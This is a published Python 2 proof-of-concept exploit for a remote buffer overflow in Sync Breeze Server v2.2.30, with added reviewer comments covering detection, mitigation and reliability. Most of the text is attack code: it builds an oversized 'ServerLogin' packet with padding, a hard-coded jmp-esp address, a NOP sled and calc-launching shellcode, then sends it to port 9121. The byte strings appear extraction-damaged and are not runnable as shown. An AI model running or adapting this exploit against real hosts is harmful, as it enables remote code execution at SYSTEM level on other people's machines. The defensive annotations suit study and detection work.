syncbreeze-overflow.txt
Posted on 11 October 2010
#!/usr/bin/python
# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely affected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A
#
### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after
# accepting a connection from a remote client. If a packet with a length greater than 484
# bytes is received with the command prefix "ServerLogin." the affected service (syncbrs.exe)
# will crash as the result of a buffer overflow. An attacker can easily leverage this
# vulnerability and control execution flow / execute arbitrary code.
###
# This PoC's Usage:
# 1. Verify that the service is running on the remote machine, the default port is 9121.
# 2. Execute syncbreeze.py against the host
# 3. Check the remote machine's process list for calc to verify successful command execution.
#    (Running as SYSTEM, on my test machine at least..)
###
# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at
# admin / (system) level. This could be a potential privilege escalation attack vector
# (although I have not verified this yet)
# I am sure a lot more can be done with this (fit more shellcode, universal etc.) I'll leave
# that up to researchers however.
# Have fun!
###
### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###
#
# NOTE(review): defender-side reading of this proof of concept.
# - Trigger: one unauthenticated TCP connection to the service port (9121 below)
#   carrying a "ServerLogin" request far longer than the 484-byte bound quoted above.
#   A sensor watching this port can flag login requests that exceed that length; a
#   long run of 0x90 bytes in the request body is a second, weaker indicator.
# - Impact: by the author's own note the service runs as SYSTEM, so a successful
#   overflow is a remote compromise of the host, not only a service crash.
# - Mitigation: update beyond v2.2.30 (or remove the service) and limit network
#   reach to TCP/9121 to the hosts that need it; the port is described below as not
#   configurable, so a network ACL is the practical control.
# - Reliability: the return address below is a fixed ws2_32.dll address the author
#   tied to one Windows XP SP3 machine; on other builds the fixed address most
#   likely yields a crash (denial of service) rather than code execution.
# - Provenance: this copy appears extraction-damaged -- the byte-string literals
#   below have lost their escape backslashes and the original newline escapes show
#   up as spaces or line breaks -- so the listing is not runnable as shown. It is
#   kept byte-identical here; only comments were added.
# - Language: Python 2 syntax (print statements, str payloads).
import sys,socket

# Exactly one argument is accepted: the target host.
if len(sys.argv) != 2:
    print "[!] 
Usage: ./syncbreeze.py <Target IP>"
    sys.exit(1)

# Banner printed before any network activity (the original line separators
# appear as trailing spaces in this copy).
about = "================================================= "
about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoC "
about += "Author: xsploited security URL: http://www.x-sploited.com/ "
about += "Contact: xsploitedsecurity [at] gmail.com "
print about

host = sys.argv[1]
port = 9121 #default server port, unchangeable (I think) -- hence the network ACL advice above

# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
# Payload whose only visible effect is launching calc (the "check the process
# list" step in the usage notes). Escape backslashes are missing in this copy.
calc = ("x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13x97x8c"
"x8ax10x83xebxfcxe2xf4x6bx64x03x10x97x8cxeax99"
"x72xbdx58x74x1cxdexbax9bxc5x80x01x42x83x07xf8"
"x38x98x3bxc0x36xa6x73xbbxd0x3bxb0xebx6cx95xa0"
"xaaxd1x58x81x8bxd7x75x7cxd8x47x1cxdex9ax9bxd5"
"xb0x8bxc0x1cxccxf2x95x57xf8xc0x11x47xdcx01x58"
"x8fx07xd2x30x96x5fx69x2cxdex07xbex9bx96x5axbb"
"xefxa6x4cx26xd1x58x81x8bxd7xafx6cxffxe4x94xf1"
"x72x2bxeaxa8xffxf2xcfx07xd2x34x96x5fxecx9bx9b"
"xc7x01x48x8bx8dx59x9bx93x07x8bxc0x1exc8xaex34"
"xccxd7xebx49xcdxddx75xf0xcfxd3xd0x9bx85x67x0c"
"x4dxfdx8dx07x95x2ex8cx8ax10xc7xe4xbbx9bxf8x0b"
"x75xc5x2cx72x84x22x7dxe4x2cx85x2ax11x75xc5xab"
"x8axf6x1ax17x77x6ax65x92x37xcdx03xe5xe3xe0x10"
"xc4x73x5fx73xf6xe0xe9x10");

# Begin payload buffer:
# The hex values spell "ServerLogin" (the command prefix named in the
# vulnerability note) followed by a single 0x02 byte.
packet_header = ("x53x65x72x76x65x72x4Cx6Fx67x69x6Ex02");
junk = "x90" * 256; #256-byte junk buffer to reach eip (the original comment said 265)
eip = "xFBxF8xABx71"; #jmp esp (via ws2_32.dll) -- build-specific, see reliability note above
nops = "x90" * 12; #small nop sled
# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
# Total length is well past the 484-byte limit quoted in the header, which is the
# property a length-based detection rule keys on.
packet = packet_header + junk + eip + nops + calc + nops + nops;

print "[*] Connecting to " + host + "... "
# No try/except around connect/send: an unreachable host or closed port raises
# socket.error and the script ends with a traceback, leaving the socket unclosed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print "[*] Connected, Sending payload "
# Trailing separator appended to the packet (its original escape is lost in this copy).
s.send(packet + " ")
# Nothing is read back: "successfully" only means send() returned, not that the
# service reacted in any particular way.
print "[*] Payload sent successfully"
print "[*] Check the results "
s.close()